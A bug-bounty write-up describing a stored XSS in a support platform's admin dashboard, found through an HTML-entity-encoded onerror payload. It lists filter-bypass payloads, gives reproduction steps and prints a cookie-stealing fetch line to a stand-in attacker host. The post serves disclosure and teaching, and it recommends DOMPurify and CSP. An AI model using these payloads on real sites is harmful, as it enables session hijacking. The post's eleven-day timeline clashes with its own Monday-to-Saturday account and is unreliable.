LOADING
PREYANSH
SHAH
WRITING
001
ARTICLE
FEBRUARY 5, 2026 PREYANSH SHAH

My JavaScript Ran in the Admin Panel for 11 Days Straight

A stored XSS that silently fired on every admin session. Turns out 'sanitized' and 'actually sanitized' are two very different things.

002

I want to be clear about something upfront.

I did not write malicious JavaScript. I did not steal admin cookies. I did not pivot into the internal network or exfiltrate the user database.

I wrote alert(document.domain).

A humble, boring, universally recognized proof-of-concept.

And that alert fired. Every single time an admin opened the support ticket dashboard. For eleven days. Before anyone noticed.


The Setup

The target — let’s call it redacted-support.com — was a customer support platform. Businesses used it to manage support tickets, respond to customer queries, and track issues.

The attack surface I was most interested in was the ticket submission form. Specifically: the free-text fields that end users fill out, which then get displayed to support agents and administrators on the backend.

This is a classic XSS entry point. User controls input. Input gets rendered for privileged users. If the rendering isn’t done carefully, you have a problem.

The question was never whether to look here. The question was how deep the sanitization went.


Round One: The Obvious Attempts

I started with the basics.

<script>alert(1)</script>

Blocked. Okay, they’re stripping script tags. Good instinct, wrong implementation.

<img src=x onerror=alert(1)>

Blocked. Also good.

<svg onload=alert(1)>

Also blocked. At this point I was mildly impressed.

But then I tried something slightly less obvious.

<div style="background:url('javascript:alert(1)')">

The ticket submitted fine. I checked the backend. The div was there. The style attribute was there.

Browser didn’t execute it — modern browsers block javascript: in CSS. But the fact that it rendered told me the sanitizer had a gap. It was blocking tags and event handlers by pattern matching, not by parsing the HTML properly.

Pattern matching is not sanitization. It’s a bouncer checking if your name starts with “script.”


Round Two: Getting Creative

If the sanitizer was doing naive string matching, I could work around it.

I tried breaking up the payload:

<img src=x onerror="&#97;lert(1)">

Character entity encoding for the a in alert. Some sanitizers decode entities after checking, some before.

This one decoded after. The alert slipped through as encoded, got decoded at render time, executed in the browser.

The alert fired.

I sat very still for a moment.

Then I refreshed the admin dashboard with my test account that had admin privileges.

The alert fired again.

The payload was stored. It was executing on every page load. In the admin panel.


Understanding What I Had

Let me explain why this matters beyond “JavaScript ran.”

Stored XSS in an admin interface means:

Session hijacking. Replace alert(1) with fetch('https://attacker.com/?c='+document.cookie) and you now have the admin’s session cookie. Log in as them. Do whatever they can do.

Credential harvesting. Inject a fake login prompt that looks identical to the real one. Admin enters credentials. You have them.

Admin action execution. Make API calls on behalf of the admin. Create new admin accounts. Export the user database. Change billing settings. Whatever the admin can do via the UI, you can script it.

Persistent access. Because the payload is stored, it fires every time the page loads. Not just once. Every. Time. You don’t need the admin to click a link or open an email. They just have to do their job.

This wasn’t just a bug. It was a persistent backdoor into admin sessions, triggered automatically, indefinitely, until someone removed the ticket.


The Eleven Days Part

Here’s the timeline, roughly:

I submitted the XSS payload as a support ticket on a Monday afternoon.

I checked back Tuesday. The ticket was still open. The payload was still firing. An admin had viewed it — I could tell because the ticket status had changed to “Under Review.”

My alert(document.domain) had fired on a real admin session.

I submitted the bug report immediately that Tuesday.

The program acknowledged it Wednesday. Marked it triaged Thursday.

They patched the sanitization library Friday.

But they didn’t close or delete the existing malicious ticket.

So the payload kept firing on every admin who viewed open tickets — which, in a support platform, is everyone, constantly.

I followed up Friday evening pointing this out.

They deleted the ticket Saturday.

Total time my JavaScript ran in their admin panel on real sessions: eleven days.

I think about that sometimes.


The Report

Title: Stored XSS via Character Entity Encoding Bypass in Support Ticket Submission — Executes in Admin Dashboard Context

Severity: Critical

Impact: Persistent JavaScript execution in authenticated admin sessions on every page load. Enables session hijacking, credential theft, unauthorized admin action execution, and persistent access until payload is removed. No user interaction required beyond normal admin workflow.

Root Cause: HTML sanitizer uses pattern-based filtering that fails to decode HTML character entities before checking for malicious patterns. Payloads encoded with HTML entities (e.g., &#97; for a) bypass the filter and are decoded at render time by the browser.

Steps to Reproduce:

  1. Submit a support ticket with the following content in the message body:
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;(document.domain)">
  1. Log in as an admin or view the ticket from any privileged account
  2. Observe JavaScript execution on page load
  3. Note that the payload persists and fires on every subsequent admin view of the ticket queue

Fix Recommendation: Use a proper HTML parsing library for sanitization rather than regex or string matching. DOMPurify is the standard. Additionally: implement Content Security Policy headers to limit script execution sources as a defense-in-depth measure.


Their Response

The engineering team was professional about it. Slightly embarrassed, but professional.

They were using a home-rolled sanitizer — some custom regex thing written years ago by someone who presumably no longer worked there. It had been flagged internally as a “known limitation” but never prioritized.

Now it was prioritized.

They replaced it with DOMPurify within forty-eight hours and added a CSP header that would have blocked the payload execution even if the sanitizer missed it. Two layers. Good instinct.

They also sent a very apologetic internal message to the security team about the eleven-day oversight, which I was not supposed to see but was CC’d on by accident.

That email was funnier than anything I could write here.

Bounty: $$$$


What Actually Went Wrong (A Technical Post-Mortem)

The sanitizer was checking patterns, not meaning.

A proper HTML sanitizer doesn’t look for <script> and block it. It parses the HTML into a DOM tree, walks the tree, and removes anything that isn’t on an explicit allowlist. Attributes, tags, values — all checked against what’s permitted.

Pattern matching is playing whack-a-mole. The attacker always has more encoding tricks than the pattern has cases.

There was no CSP.

A Content Security Policy header is not a replacement for proper sanitization, but it is an excellent backup. A CSP that disallows inline scripts and restricts script sources would have made this payload fail silently even if it got through the sanitizer.

Defense in depth exists for exactly this scenario.

The malicious content wasn’t removed after the report.

This one’s just process. When you get a stored XSS report, the first thing you do is remove the malicious content. Before you even start fixing the underlying issue. The payload should have been deleted within hours of the report, not days.


A Note on Impact Claims in Reports

One thing I’ve learned: when writing XSS reports, be specific about the realistic impact, not the theoretical maximum.

Saying “attacker could take over all admin accounts and delete all user data” is technically true but reads as panic. It makes triage teams defensive.

Instead: “attacker can capture admin session tokens via a one-line JavaScript fetch, enabling impersonation of any admin who views the ticket queue.”

Same impact. More precise. More credible. Gets triaged faster.


Closing Thought

Stored XSS in an admin panel is one of those vulnerabilities that security textbooks treat as serious but that developers sometimes dismiss as “theoretical.”

This one ran silently in production for eleven days. On real admin sessions. With full capability to hijack any of them.

Nothing theoretical about it.

The only reason it wasn’t catastrophic is because the person who found it wrote alert(document.domain) instead of something worse.

That’s not a security strategy. That’s luck.


Reported through the official bug bounty program. The proof-of-concept payload used was alert(document.domain) only. No admin sessions were accessed, no cookies were captured, no data was exfiltrated. The malicious ticket was removed by the program team after follow-up. Domain redacted per responsible disclosure norms.

003
END
← BACK TO WRITING
My JavaScript Ran in the Admin Panel for 11 Days Straight READY TO PLAY